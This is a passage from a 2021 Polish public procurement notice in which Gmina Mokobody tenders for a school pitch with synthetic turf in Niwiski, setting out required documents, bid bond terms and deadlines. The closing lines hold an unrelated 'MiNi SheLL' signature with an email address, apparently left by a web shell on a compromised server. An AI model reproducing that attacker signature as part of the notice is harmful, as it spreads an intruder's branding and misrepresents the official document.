class="normal">Na wezwanie Zamawiającego Wykonawca zobowiązany jest do złożenia<br/>następujących oświadczeń lub dokumentów, potwierdzających spełnianie warunków udziału w<br/>postępowaniu:<br/>1) wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne<br/>dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – inne dokumenty – na potwierdzenie spełniania warunku określonego w rozdziale V pkt 2<br/>ppkt 4 lit. a SWZ, stanowiący załącznik nr 4 do SWZ;<br/>2) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – na potwierdzenie spełniania warunku określonego w rozdziale V pkt 2<br/>ppkt 4 lit. b SWZ, stanowiący załącznik nr 5 do SWZ; <br/>3) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia; <br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji<br/>finansowej lub ekonomicznej wymaganych powyżej przez Zamawiającego, może złożyć inny<br/>dokument, który w wystarczający sposób potwierdzi spełnianie opisanego przez Zamawiającego<br/>warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający na podstawie art. 104-107 ustawy Pzp żąda niżej wymienionych<br/>przedmiotowych środków dowodowych związanych z przedmiotem zamówienia: <br/>a) Raport z badań przeprowadzony przez specjalistyczne laboratorium (np. Labosport lub ISA-<br/>Sport lub Sports Labs Ltd,), potwierdzający minimalne parametry oferowanej trawy syntetycznej<br/>określone przez Zamawiającego.<br/>b) Badanie na zgodność z normą PN-EN 15330-1:2014 (w projekcie budowlanym jest podana<br/>nieaktualna norma) lub wynik badań specjalistycznego laboratorium badającego nawierzchnie<br/>sportowe np. Labosport.<br/>c) Atest higieniczny PZH dla oferowanej nawierzchni.<br/>d) Karta techniczna potwierdzona przez producenta nawierzchni.<br/>e) Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną<br/>inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.<br/>2. Zamawiający żąda złożenia przedmiotowych środków dowodowych wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone<br/>przedmiotoweśrodki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub<br/>uzupełnienia wwyznaczonym terminie. Przedmiotowe środki dowodowe podlegające<br/>uzupełnieniu:) Raport z badań przeprowadzony przez specjalistyczne laboratorium (np.<br/>Labosport lub ISA-Sport lub Sports Labs Ltd,), potwierdzający minimalne parametry oferowanej<br/>trawy syntetycznej określone przez Zamawiającego.<br/>b) Badanie na zgodność z normą PN-EN 15330-1:2014 (w projekcie budowlanym jest podana<br/>nieaktualna norma) lub wynik badań specjalistycznego laboratorium badającego nawierzchnie<br/>sportowe np. Labosport.<br/>c) Atest higieniczny PZH dla oferowanej nawierzchni.<br/>d) Karta techniczna potwierdzona przez producenta nawierzchni.<br/>e) Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną<br/>inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Informacja o podmiocie wspólnym - jeżeli dotyczy 2)Pełnomocnictwo - jeżeli dotyczy<br/>3)Dokument potwierdzający wniesienie wadium -obowiązkowy 4) Zobowiązanie podmiotu<br/>udostępniającego zasoby Wykonawcy - jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia przez wykonawców wadium w wysokości 2 000,00 zł w formie<br/>przewidzianej ustawą Pzp.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu (przelewu na konto Zamawiającego),<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2018 r., poz. 110).<br/>3. Wadium należy wnieść przed upływem terminu do składania ofert. Za skuteczne wniesienie<br/>wadium uznaje się moment jego zaksięgowania na rachunku bankowym Zamawiającego, a nie<br/>moment wydania dyspozycji przelewu przez Wykonawcę.<br/>4. W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wnieść przelewem na<br/>konto Zamawiającego Bank Spółdzielczy w Mokobodach nr 16 9193 0008 0000 0101 2000<br/>0030, Urząd Gminy Mokobody, ul. Plac Chreptowicza 25 08-124 Mokobody z adnotacją:<br/>Wadium w postępowaniu o udzielenie zamówienia publicznego na: „Budowa boiska<br/>przyszkolnego z nawierzchnią z trawy sztucznej przy Zespole Szkolno-Przedszkolnym w<br/>Niwiskach” znak GP.271.1.7.2021. Kserokopię dowodu dokonania przelewu należy dołączyć do<br/>oferty.<br/>5. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, określonych w pkt<br/>2 ppkt 2 do 4 (tj. w formie gwarancji lub poręczenia), Wykonawca przekazuje Zamawiającemu<br/>oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6. Zapisy w treści gwarancji lub poręczeń (niewynikające z odrębnych, ogólnie obowiązujących<br/>przepisów, które winny być wówczas powołane) nie mogą utrudniać Zamawiającemu realizacji<br/>swoich praw do zatrzymania wadium wynikających z zapisów ustawy w art. 98 ust. 6 ustawy Pzp<br/>i spełniać co najmniej poniższe wymagania:<br/>1) wadium musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę<br/>wadium przez Wykonawcę określone w ustawie Pzp;<br/>2) z treści gwarancji lub poręczenia powinno jednoznacznej wynikać zobowiązanie gwaranta do<br/>zapłaty całej kwoty wadium;<br/>3) wadium powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści gwarancji lub poręczenia powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>6) beneficjentem gwarancji lub poręczenia jest: Gmina Mokobody, ul. Plac Chreptowicza 25, 08-<br/>124 Mokobody;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58<br/>ustawy Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.<br/>2. W przypadku gdy Wykonawcy wspólnie się ubiegają o udzielenie zamówienia zgodnie z art.<br/>117 ust. 4 ustawy Pzp obligatoryjnie do oferty muszą dołączyć oświadczenie, z którego będzie<br/>wynikało, które roboty budowlane wykonują poszczególni Wykonawcy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) żaden z wykonawców nie może podlegać wykluczeniu oraz wykonawcy wykazują spełnianie<br/>warunków udziału w postępowaniu zgodnie z ppkt 4;<br/>2) oświadczenie, o którym mowa w rozdziale VII pkt 1 SWZ składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia;<br/>3) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie;<br/>4) Wykonawcy zobowiązani są, na wezwanie Zamawiającego, złożyć dokumenty i<br/>oświadczenia, o których mowa w rozdziale VII SWZ, przy czym składa je odpowiednio<br/>Wykonawca/-y, który/którzy wykazuje/-ą spełnianie warunku w zakresie opisanym w rozdziale V<br/>pkt 2 SWZ.<br/>4. Jeżeli w postępowaniu o udzielenie zamówienia publicznego zostanie wybrana oferta<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej<br/>współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust. 1 pkt. 1 ustawy Pzp przewiduje się zmiany postanowień zawartej umowy<br/>(w formie aneksu) w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, bez przeprowadzania nowego postępowania , dotyczące:<br/>1) zmiany terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących<br/>okoliczności:<br/>a) wystąpienia warunków atmosferycznych, które uniemożliwiają lub znacznie utrudniają<br/>wykonanie robót,<br/>b) wyjątkowo trudnych warunków gruntowo-wodnych, które nie zostały przewidziane w<br/>dokumentacji,<br/>c) wystąpienia niezgodności w zakresie terenu robót wynikającego z pomiarów geodezyjnych,<br/>d) konieczności uzyskania dodatkowych uzgodnień lub pozwoleń,<br/>e) gdy wykonanie robót nie będzie możliwe ze względów technologicznych,<br/>f) opóźnienia w uzyskaniu przez Zamawiającego pozwolenia na budowę/upływ u terminu na<br/>wniesienie sprzeciwu przez właściwy organ,<br/>g) wystąpienia robót dodatkowych nieobjętych zamówieniem podstawowym lub robót<br/>zamiennych.<br/>2) zmiany osoby pełniącej funkcję kierownika budowy w przypadku zaistnienia jednej z<br/>następujących okoliczności:<br/>a) niewykonywania lub nienależytego wykonywania swoich obowiązków wynikających z umowy,<br/>b) śmierci, choroby trwającej dłużej niż 5 dni lub innych zdarzeń losowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-19 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Formularz do złożenia ofert dostępny na ePUAP i udostępniony również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-19 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-17</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-04 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com